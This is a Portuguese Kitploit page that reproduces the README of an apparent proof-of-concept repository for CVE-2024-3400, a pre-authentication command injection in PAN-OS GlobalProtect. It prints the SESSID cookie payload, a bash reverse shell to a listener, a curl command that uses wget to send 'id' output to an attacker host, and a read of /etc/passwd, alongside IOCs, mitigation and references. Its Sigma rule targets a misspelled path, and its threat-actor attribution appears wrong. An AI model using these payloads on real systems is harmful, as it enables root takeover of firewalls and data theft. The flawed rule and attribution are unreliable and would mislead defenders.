Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2024-3400-panos_rce_reproduction — Reprodução de cve-2024-3400-panos_rce_reproduction | Kitploit
Ferramentas/GitHubGitHub/razureink/cve-2024-3400-panos_rce_reproduction
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleAprendizado e EducaçãoRed TeamingLabs e Prática
GitHub
razureink/cve-2024-3400-panos_rce_reproduction

cve-2024-3400-panos_rce_reproduction

Reprodução de cve-2024-3400-panos_rce_reproduction

Ver Repositório
4há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-3400: Injeção de Comando RCE no GlobalProtect do PAN-OS Palo Alto

CVSS 10.0 CRÍTICO | CWE-78: Injeção de Comando do SO | Explorado em Massa na Natureza


Visão Geral

A CVE-2024-3400 é uma vulnerabilidade de injeção de comando pré-autenticação nas interfaces de portal e gateway do GlobalProtect do PAN-OS da Palo Alto Networks. A vulnerabilidade permite que um atacante não autenticado execute comandos arbitrários com privilégios de root no firewall afetado.

  • Descoberta por: Volexity (abril de 2024)
  • Ator de ameaça atribuído: UNC4554 / Midnight Blizzard (patrocinado pelo estado russo)
  • ID CVE: CVE-2024-3400
  • Pontuação CVSS: 10.0 (Crítico)
  • CWE: CWE-78 (Neutralização Incorreta de Elementos Especiais usados em um Comando do SO)
  • Impacto: Comprometimento total dos appliances de firewall PAN-OS, movimento lateral, implantação de ransomware
  • Status: Explorado ativamente como 0-day antes da divulgação pública

Detalhes Técnicos

Causa Raiz

A vulnerabilidade reside no tratamento do cookie de sessão do componente de portal e gateway do GlobalProtect. A função responsável por processar o cookie SESSID não sanitiza adequadamente a entrada fornecida pelo usuário antes de passá-la para um comando de shell.

Especificamente, uma requisição HTTP não autenticada ao endpoint do portal GlobalProtect (/global-protect/login.esp) com um cookie SESSID especialmente elaborado contendo metacaracteres de shell incorporados (aspas invertidas e expansão de variáveis) resulta em injeção de comando.

Mecanismo de Injeção

O caminho de código vulnerável opera da seguinte forma:

  1. O portal GlobalProtect recebe uma requisição para /global-protect/login.esp
  2. O valor do cookie SESSID é extraído sem sanitização
  3. Esse valor é interpolado em uma string de comando de shell
  4. O comando é executado via system() ou função similar de execução de comando do SO
  5. Como a aplicação é executada como root, o comando injetado é executado com privilégios totais do sistema

Construção do Payload

O payload de injeção utiliza comandos delimitados por aspas invertidas dentro do cookie SESSID:

root@kitploit:~
SESSID=/../../../opt/panlogs/tmp/device_telemetry/`COMMAND`.py

O path traversal (/../../../) sai do diretório pretendido, e a parte COMMAND entre aspas invertidas faz com que o shell execute a entrada do atacante. Redirecionamento de saída ou mecanismos de reverse shell podem ser usados para exfiltrar os resultados do comando.


Versões Afetadas

Versão do PAN-OSAfetadasCorrigida Em
10.2.x< 10.2.4-h16, < 10.2.5-h6, < 10.2.6-h3, < 10.2.7-h8, < 10.2.8-h3, < 10.2.9-h110.2.4-h16 / 10.2.5-h6 / 10.2.6-h3 / 10.2.7-h8 / 10.2.8-h3 / 10.2.9-h1
11.0.x< 11.0.1-h10, < 11.0.2-h4, < 11.0.3-h1011.0.1-h10 / 11.0.2-h4 / 11.0.3-h10
11.1.x< 11.1.1-h311.1.1-h3

Nota: PAN-OS 9.x e versões anteriores não são afetados. Cloud NGFW e Prisma Access não são afetados.


Exploração

Vetor de Ataque

  • Rede: Remoto
  • Autenticação: Nenhuma exigida
  • Privilégio Necessário: Nenhum
  • Interação do Usuário: Nenhuma
  • Impacto: Comprometimento completo da confidencialidade, integridade e disponibilidade

Atividade Observada do Ator de Ameaça

UNC4554 / Midnight Blizzard (APT29) foi observado explorando a CVE-2024-3400 como 0-day a partir de março de 2024. A Volexity publicou sua análise em 12 de abril de 2024. Os padrões de ataque incluíram:

  1. Acesso Inicial: Varredura em massa por portais GlobalProtect expostos
  2. Execução de Comandos: Implantação de backdoors Python personalizados via vetor de injeção de cookie
  3. Persistência: Instalação do backdoor UPSTYLE, roubo de credenciais, extração de configurações
  4. Movimento Lateral: Uso de firewalls comprometidos como ponto de apoio em redes internas
  5. Exfiltração de Dados: Roubo de arquivos de configuração, credenciais de VPN e tokens de sessão
  6. Ransomware: Múltiplos incidentes de implantação de ransomware após o comprometimento inicial

Disponibilidade de Prova de Conceito

Múltiplos PoCs públicos foram divulgados. Este repositório fornece um exploit funcional para testes autorizados.


Etapas de Reprodução

Requisitos

  • Python 3.8+
  • Biblioteca requests
  • Alvo: PAN-OS Palo Alto com um portal GlobalProtect vulnerável exposto
  • Somente com acesso autorizado

Configuração

root@kitploit:~
pip install requests

Exploit Básico

root@kitploit:~
python exploit.py --target https://vulnerable-firewall.example.com --command "id"

Exemplo de Reverse Shell

root@kitploit:~
# Start listener on attacker machine
nc -lvnp 4444

# Execute reverse shell
python exploit.py --target https://vuln-panos.example.com \
  --command "bash -c 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1'"

Leitura Arbitrária de Arquivos

root@kitploit:~
python exploit.py --target https://vuln-panos.example.com --command "cat /etc/passwd"

Prova de Conceito (curl)

root@kitploit:~
# Basic command execution test
curl -k --cookie "SESSID=/../../../opt/panlogs/tmp/device_telemetry/\`id\`.py" \
  'https://target/global-protect/login.esp'

# Command output capture via DNS exfiltration
curl -k --cookie "SESSID=/../../../opt/panlogs/tmp/device_telemetry/\`wget -O- http://attacker/$(id|base64)\`.py" \
  'https://target/global-protect/login.esp'

Script do PoC

Veja exploit.py neste repositório para um exploit Python completo com suporte a:

  • Execução arbitrária de comandos
  • Suporte opcional a proxy (Burp Suite / mitmproxy)
  • Controle de verificação SSL
  • Tratamento de timeout e novas tentativas
  • Análise de resposta

Detecção

IOCs

  • Requisições a /global-protect/login.esp com cookies SESSID anormalmente longos ou suspeitos
  • Cookies contendo sequências de path traversal (/../../) combinadas com caracteres de aspas invertidas
  • Processos inesperados gerados pelo componente GlobalProtect
  • Conexões de saída do firewall para endereços IP desconhecidos em portas incomuns
  • Arquivos gravados em /opt/panlogs/tmp/device_telemetry/ com extensões .py

Regra Sigma (Simplificada)

root@kitploit:~
title: CVE-2024-3400 PAN-OS GlobalProtect Command Injection
status: stable
logsource:
  category: webserver
detection:
  selection:
    cs-uri-query: "/global-protocol/login.esp"
    cs-cookie|contains:
      - "../"
      - "`"
  condition: selection

Mitigação

Ações Imediatas

  1. Atualize o PAN-OS para as versões corrigidas listadas acima
  2. Se a correção imediata não for possível, aplique uma das seguintes soluções alternativas:
    • Desativar Telemetria do Dispositivo: set deviceconfig system telemetry disable yes (bloqueia o caminho de código vulnerável sem exigir reinicialização)
    • Controle de Acesso do Portal/Gateway GlobalProtect: Restrinja o acesso a IPs de origem confiáveis
  3. Verifique se há comprometimento: Procure por arquivos não autorizados em /opt/panlogs/tmp/device_telemetry/
  4. Revise os logs: Audite os logs de login do GlobalProtect em busca de valores anômalos de cookie SESSID

Correção Permanente

Aplique o hotfix fornecido pela Palo Alto Networks. A correção sanitiza adequadamente a entrada do cookie antes da construção do comando de shell.

Avaliação de Comprometimento

Se você suspeitar de exploração:

  1. Colete imagens forenses dos firewalls afetados
  2. Audite todas as alterações de configuração (timestamps de última modificação)
  3. Revise os processos em execução e as tarefas cron
  4. Verifique se há chaves SSH e contas de usuário não autorizadas
  5. Roteie todas as credenciais de VPN e segredos compartilhados
  6. Inspecione o tráfego de rede em busca de padrões de comunicação C2

Referências

FonteLink
Comunicado de Segurança da Palo Altohttps://security.paloaltonetworks.com/CVE-2024-3400
Análise da Volexityhttps://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-command-injection-vulnerability-in-palo-alto-networks-pan-os/
Registro NVDhttps://nvd.nist.gov/vuln/detail/CVE-2024-3400
Detalhes da CWE-78https://cwe.mitre.org/data/definitions/78.html
Catálogo KEV da CISAhttps://www.cisa.gov/known-exploited-vulnerabilities-catalog
Técnica ATT&CKhttps://attack.mitre.org/techniques/T1190/

Aviso Legal

Este repositório é fornecido somente para testes de segurança autorizados e fins educacionais. A exploração não autorizada desta vulnerabilidade é ilegal. Os autores não são responsáveis pelo uso indevido destas informações. Sempre garanta que você tenha permissão explícita por escrito antes de testar qualquer sistema.


Licença

Licença MIT - Este conteúdo é fornecido para pesquisa de segurança defensiva e testes autorizados.

Baixar ferramenta